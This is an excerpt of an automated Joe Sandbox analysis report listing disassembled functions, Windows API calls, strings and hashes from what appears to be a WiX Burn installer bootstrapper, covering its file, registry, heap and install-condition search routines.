Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: fileutil.cpp
API String ID: 442123175-2967768451
Opcode ID: 8571797e90605480c1885bd62ca0924bc43be4236bc203934ad2a0da5e7df032
Instruction ID: 61f563ac681d17d49088513430e0fdb33c409d3bea45cc22d2c6bb0bd46715e4
Opcode Fuzzy Hash: 8571797e90605480c1885bd62ca0924bc43be4236bc203934ad2a0da5e7df032
Instruction Fuzzy Hash: F7F08172601229BBD7109E9ACC48E9FBBAEFB44761F010117FD04D7140D631AD0096F1

Function 000D47D3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00000000,?,?,?,000A8564,00000000,00000000,00000000,00000000,00000000), ref: 000D47EB
GetLastError.KERNEL32(?,?,?,000A8564,00000000,00000000,00000000,00000000,00000000), ref: 000D47F5

Strings

fileutil.cpp, xrefs: 000D4819

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: fileutil.cpp
API String ID: 2976181284-2967768451
Opcode ID: 7dbceb4cd53e159c0c87b9dae12a6cd1529d03347a6ba0bde13252a64dcb6ef6
Instruction ID: 94c28a8898ca98c0472b3af17018edcb098e1fefd39f50d213adec4356e30313
Opcode Fuzzy Hash: 7dbceb4cd53e159c0c87b9dae12a6cd1529d03347a6ba0bde13252a64dcb6ef6
Instruction Fuzzy Hash: 48F01D71A00359ABAB209F959C09DAB7BE8EF08790B01411ABD05D7250D631DD10EBF4

Function 000937EA Relevance: 4.6, APIs: 3, Instructions: 79libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00093829
GetLastError.KERNEL32 ref: 00093833
LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 0009389B

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: DirectoryErrorLastLibraryLoadSystem
String ID:
API String ID: 1230559179-0
Opcode ID: cd057fcd30c0d3e6de179def7ea2bf275d4b8a82de8e3ce047cb97f5776ed320
Instruction ID: 6507ea1699abcaf283e00d9bd17cc0266583483a2f8113534f5f272edcd920bc
Opcode Fuzzy Hash: cd057fcd30c0d3e6de179def7ea2bf275d4b8a82de8e3ce047cb97f5776ed320
Instruction Fuzzy Hash: 642198B6D01329A7EF209B649C49FEBB7BCDB04710F114165BD14E7241EA34DE449FA0

Function 00093999 Relevance: 4.5, APIs: 3, Instructions: 20memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00093B34,00000000,?,00091472,00000000,80004005,00000000,80004005,00000000,000001C7,?,000913B7), ref: 000939A3
RtlFreeHeap.NTDLL(00000000,?,00093B34,00000000,?,00091472,00000000,80004005,00000000,80004005,00000000,000001C7,?,000913B7,000001C7,00000100), ref: 000939AA
GetLastError.KERNEL32(?,00093B34,00000000,?,00091472,00000000,80004005,00000000,80004005,00000000,000001C7,?,000913B7,000001C7,00000100,?), ref: 000939B4

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Heap$ErrorFreeLastProcess
String ID:
API String ID: 406640338-0
Opcode ID: f3facd98a0105b490e7ff639104b7b3c890b7550c9b33d70aa7a5f10123da143
Instruction ID: 832bac31970496a527dd9bb40edea5ebaca67f5e54abf1641f61830c32b87a6a
Opcode Fuzzy Hash: f3facd98a0105b490e7ff639104b7b3c890b7550c9b33d70aa7a5f10123da143
Instruction Fuzzy Hash: 3FD01236601234A797202BFA5C0C697BFDCEF456A17424022FD09D2110D729881096F4

Function 000D0E3F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,000D5699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 000D0E52

Strings

regutil.cpp, xrefs: 000D0E8A

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Open
String ID: regutil.cpp
API String ID: 71445658-955085611
Opcode ID: bed32bd6902233985b15bf539c7806fc1414bf7b284ad317050a99a131b1157b
Instruction ID: dd3b6380a1c740c8b22d82e8d21da5bdf9c7f78f35ae02313d72b3828878291a
Opcode Fuzzy Hash: bed32bd6902233985b15bf539c7806fc1414bf7b284ad317050a99a131b1157b
Instruction Fuzzy Hash: 88F0A772701235ABEF245A569C00BBB7EC5DF446A0F118625BD4DDA651D236CC10E7E0

Function 000D3499 Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 000D34CE

Part of subcall function 000D2F23: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,000D34DF,00000000,?,00000000), ref: 000D2F3D
Part of subcall function 000D2F23: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,000BBDED,?,000952FD,?,00000000,?), ref: 000D2F49

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorHandleInitLastModuleVariant
String ID:
API String ID: 52713655-0
Opcode ID: a26a04bc0e2b8b00aab9f705039fdee06e71e01079fde6a28c9d50fcf13d0dd9
Instruction ID: 6be39442f3e09f5db6b4769d0c5f4cf097a09e2ec57e0ca610275097cbae1ca6
Opcode Fuzzy Hash: a26a04bc0e2b8b00aab9f705039fdee06e71e01079fde6a28c9d50fcf13d0dd9
Instruction Fuzzy Hash: 6A313BB6E007199BCB11DFA8D884ADEB7F8EF08710F01456AED15EB311D6719E008BA5

Function 000D5728 Relevance: 1.6, APIs: 1, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(80070490,00000000,80070490,000FAAA0,00000000,80070490,00C8E628,?,000A890E,WiX\Burn,PackageCache,00000000,000FAAA0,00000000,00000000,80070490), ref: 000D5782

Part of subcall function 000D0F6E: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 000D0FE4
Part of subcall function 000D0F6E: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 000D101F

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: QueryValue$Close
String ID:
API String ID: 1979452859-0
Opcode ID: 6fefc293a01d1d736ae46fc92e967cf00609b142b5e8ca38b23ba2ca7aeebf87
Instruction ID: f3fff6648520b739abcc2ec13ba86af47e714203f3ef9a21f0244bfaac7f7fd4
Opcode Fuzzy Hash: 6fefc293a01d1d736ae46fc92e967cf00609b142b5e8ca38b23ba2ca7aeebf87
Instruction Fuzzy Hash: DE11A336C05729EBCF216EA4AC81AAEBAA5EB04322B25423BED0167311C3314D50DAF0

Function 000934C5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,000A89CA,0000001C,80070490,00000000,00000000,80070490), ref: 000934E5

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 460ba6022f28611f9a8313422373dead8e01b363ad481b1c355eb6ba0594e55c
Instruction ID: 771d964d7806b65257394e3c49ee9283034e925ec03a74561c6fbdfa63d31224
Opcode Fuzzy Hash: 460ba6022f28611f9a8313422373dead8e01b363ad481b1c355eb6ba0594e55c
Instruction Fuzzy Hash: 6FE012763012257BAE022E666D05DEB7B9CDF157507018051BE40D6101EB65EA10A6B0

Function 000CF349 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000CF35B

Part of subcall function 000D9814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000D9891
Part of subcall function 000D9814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000D98A2

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b28dc67e3cfe02471bd59049a05bf120ef34896e89ad85692c0a72e9dbfab660
Instruction ID: aedfdadd3a70101230ce2c84195881d00c47715178db197ec592d99d83fe1cfa
Opcode Fuzzy Hash: b28dc67e3cfe02471bd59049a05bf120ef34896e89ad85692c0a72e9dbfab660
Instruction Fuzzy Hash: 60B0929225860A7C22445310A806C7A0209C3C2F24334C03BBB0098441AC840A062032

Function 000CF36A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000CF35B

Part of subcall function 000D9814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000D9891
Part of subcall function 000D9814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000D98A2

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 233916b6db23d6f5ece622f846264148a72ea09b9e00e3a49f3e1cc462d2c321
Instruction ID: 25e27c19ab28d251a7bd78162de25c15738ecdadd54f01968304f9d6296d342a
Opcode Fuzzy Hash: 233916b6db23d6f5ece622f846264148a72ea09b9e00e3a49f3e1cc462d2c321
Instruction Fuzzy Hash: 4AB0929125860A6D228493145906D7A0149C3C6F20334C03AB604C9545EC8409062132

Function 000CF37A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000CF35B

Part of subcall function 000D9814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000D9891
Part of subcall function 000D9814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000D98A2

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3fe0a03680e9387868a1b99cf1417bbee0f7b9e83a865fc2c6fcbd1df3082b54
Instruction ID: 80f7b4ca953477b1dd0e8274917f1741d46aece19095d791f06d6cf69b0e92d8
Opcode Fuzzy Hash: 3fe0a03680e9387868a1b99cf1417bbee0f7b9e83a865fc2c6fcbd1df3082b54
Instruction Fuzzy Hash: 34B0929125860A6C228493145806D7A0149C3C6F20334C13AB604C9541EC8019462132

Function 000D94D5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000D94E7

Part of subcall function 000D9814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000D9891
Part of subcall function 000D9814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000D98A2

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e200f75df9cc3c2ea8634a7cb168dfb92d95f9154045bf812d11063297035264
Instruction ID: d63697c70d2647c7e111de450cfde28584ba2b26e8ef7c1c2900df11fefb247e
Opcode Fuzzy Hash: e200f75df9cc3c2ea8634a7cb168dfb92d95f9154045bf812d11063297035264
Instruction Fuzzy Hash: 8EB012C536C7097C325422145C42C7A110CDBC2F10330C23BB300E5A86BC800C063133

Function 000D94F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000D94E7

Part of subcall function 000D9814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000D9891
Part of subcall function 000D9814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000D98A2

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 12450af0048281ecfe78df99e5ea8b49fe3969939333e269e9ceb4292812d2e4
Instruction ID: ab13e5cb99043227332263a99709217895ea5da33da80762a1b7f7a74f538275
Opcode Fuzzy Hash: 12450af0048281ecfe78df99e5ea8b49fe3969939333e269e9ceb4292812d2e4
Instruction Fuzzy Hash: 8AB012C676C7066C329462145C03C7A014CC7C2F10334C23BB704C6682FC800C0A3132

Function 000D9506 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000D94E7

Part of subcall function 000D9814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000D9891
Part of subcall function 000D9814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000D98A2

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fd670e53d14d44bcb6c83ef1711671961528e201dc49a7f4e6a4f32d9d8a5374
Instruction ID: 01000cce06efcf62b0d8b29d5de28b38886061cd70b039eaa1a0931f4e1b5a24
Opcode Fuzzy Hash: fd670e53d14d44bcb6c83ef1711671961528e201dc49a7f4e6a4f32d9d8a5374
Instruction Fuzzy Hash: 80B012C536C7056C329462546E03C7A010CCBC2F10330C23BB304D6782FC840C073132

Function 000914B2 Relevance: 1.3, APIs: 1, Instructions: 54stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,000921B8,?,00000000,?,00000000,?,000938BD,00000000,?,00000104), ref: 000914E4

Part of subcall function 00093B51: GetProcessHeap.KERNEL32(00000000,000001C7,?,000921DC,000001C7,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 00093B59
Part of subcall function 00093B51: HeapSize.KERNEL32(00000000,?,000921DC,000001C7,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 00093B60

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Heap$ProcessSizelstrlen
String ID:
API String ID: 3492610842-0
Opcode ID: 0a639a7fd76ef0b78ac3bc540e55898e809bb1d3858be98dfc15c7fc78317822
Instruction ID: c1bb0f322d59a0d6cce86200aee5f9e00ce8409879512a9672bb784d49f68545
Opcode Fuzzy Hash: 0a639a7fd76ef0b78ac3bc540e55898e809bb1d3858be98dfc15c7fc78317822
Instruction Fuzzy Hash: 9201283734021AEFCF215E54DC44FDE7795AF45760F228225FA359B1A1D731EC10A690

Non-executed Functions

Function 0009A7EF Relevance: 172.2, APIs: 29, Strings: 69, Instructions: 688COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 0009B01A

Part of subcall function 000938D4: GetProcessHeap.KERNEL32(?,000001C7,?,00092284,000001C7,00000001,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 000938E5
Part of subcall function 000938D4: RtlAllocateHeap.NTDLL(00000000,?,00092284,000001C7,00000001,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 000938EC

CompareStringW.KERNEL32(0000007F,00000000,000DCA64,000000FF,DirectorySearch,000000FF,000DCA64,Condition,feclient.dll,000DCA64,Variable,?,000DCA64,000DCA64,?,?), ref: 0009A927
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Type,?,?,Path,clbcatq.dll), ref: 0009A97C
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,path,000000FF), ref: 0009A998
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,FileSearch,000000FF), ref: 0009A9BC
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Type,?,?,Path,clbcatq.dll), ref: 0009AA0F
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 0009AA29
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,RegistrySearch,000000FF), ref: 0009AA51
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKCR,000000FF,?,Root,?), ref: 0009AA8F
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKCU,000000FF), ref: 0009AAAE
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKLM,000000FF), ref: 0009AACD
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Win64,msi.dll,?,Type,?,?,Value,version.dll,?), ref: 0009AB8B
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,value,000000FF), ref: 0009ABA5

Part of subcall function 000D31C7: VariantInit.OLEAUT32(?), ref: 000D31DD
Part of subcall function 000D31C7: SysAllocString.OLEAUT32(?), ref: 000D31F9
Part of subcall function 000D31C7: VariantClear.OLEAUT32(?), ref: 000D3280
Part of subcall function 000D31C7: SysFreeString.OLEAUT32(00000000), ref: 000D328B

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,numeric,000000FF,?,VariableType,?,?,ExpandEnvironment,cabinet.dll), ref: 0009AC04
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,string,000000FF), ref: 0009AC26
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 0009AC46
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,directory,000000FF), ref: 0009AD1E
SysFreeString.OLEAUT32(?), ref: 0009AEFC

Strings

Failed to get Value attribute., xrefs: 0009AF3A
MsiProductSearch, xrefs: 0009AD37
numeric, xrefs: 0009ABF5
ComponentId, xrefs: 0009ACA5
Failed to get @ProductCode., xrefs: 0009AFBC
UpgradeCode, xrefs: 0009AD8A
Unexpected element name: %ls, xrefs: 0009AFCB
DirectorySearch, xrefs: 0009A918
version.dll, xrefs: 0009AB1C
state, xrefs: 0009ACF5, 0009AE11, 0009AEC3
DirectorySearch|FileSearch|RegistrySearch|MsiComponentSearch|MsiProductSearch|MsiFeatureSearch, xrefs: 0009A80B
Failed to get Key attribute., xrefs: 0009AF6C
keyPath, xrefs: 0009ACD9
Failed to get @ProductCode or @UpgradeCode., xrefs: 0009AF92
=S, xrefs: 0009A7EF
Invalid value for @Type: %ls, xrefs: 0009AF9F
Failed to get @UpgradeCode., xrefs: 0009AF8B
cabinet.dll, xrefs: 0009ABB8
FeatureId, xrefs: 0009AE8F
HKCU, xrefs: 0009AAA1
path, xrefs: 0009A98B, 0009AA38
Invalid value for @Root: %ls, xrefs: 0009AF76
Failed to select search nodes., xrefs: 0009A81E
RegistrySearch, xrefs: 0009AA44
msi.dll, xrefs: 0009AB5A
Failed to allocate memory for search structs., xrefs: 0009A87B
Failed to get next node., xrefs: 0009AFE9
feclient.dll, xrefs: 0009A8F6
Failed to get Win64 attribute., xrefs: 0009AF44
wininet.dll, xrefs: 0009AB01
Type, xrefs: 0009A954, 0009A9E7, 0009AB40, 0009ACC0, 0009ADC0, 0009AEAA
Failed to get search node count., xrefs: 0009A843
Variable, xrefs: 0009A8DC
Condition, xrefs: 0009A8F7
Path, xrefs: 0009A939, 0009A9CC
VariableType, xrefs: 0009ABDC
Failed to get @Path., xrefs: 0009AF30
Failed to get @Root., xrefs: 0009AF7D
ProductCode, xrefs: 0009AC82, 0009AD5A, 0009AE74
Failed to get @VariableType., xrefs: 0009AF62
MsiComponentSearch, xrefs: 0009AC5F
FileSearch, xrefs: 0009A9AF
assignment, xrefs: 0009AE2B
value, xrefs: 0009AB98
HKLM, xrefs: 0009AAC0
Invalid value for @VariableType: %ls, xrefs: 0009AF5B
Failed to get @FeatureId., xrefs: 0009AFB5
clbcatq.dll, xrefs: 0009A938, 0009A9CB, 0009AC81, 0009AE73
Failed to get @Type., xrefs: 0009AFAE
Key, xrefs: 0009AB02
comres.dll, xrefs: 0009ACA4, 0009AD59, 0009AD89, 0009AE8E
HKCR, xrefs: 0009AA80
Value, xrefs: 0009AB1D
ExpandEnvironment, xrefs: 0009ABB9
Failed to get @ComponentId., xrefs: 0009AF84
Failed to get @ExpandEnvironment., xrefs: 0009AF4E
directory, xrefs: 0009AD11
language, xrefs: 0009ADF5
exists, xrefs: 0009A96D, 0009AA00, 0009AB7C
version, xrefs: 0009AA1C, 0009AC39, 0009ADD9
Root, xrefs: 0009AA67
Failed to get @Condition., xrefs: 0009AF26
HKU, xrefs: 0009AADF
Win64, xrefs: 0009AB5B
Failed to get @Id., xrefs: 0009AFE2
MsiFeatureSearch, xrefs: 0009AE51
string, xrefs: 0009AC19
search.cpp, xrefs: 0009A871
Failed to get @Variable., xrefs: 0009AFDB

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

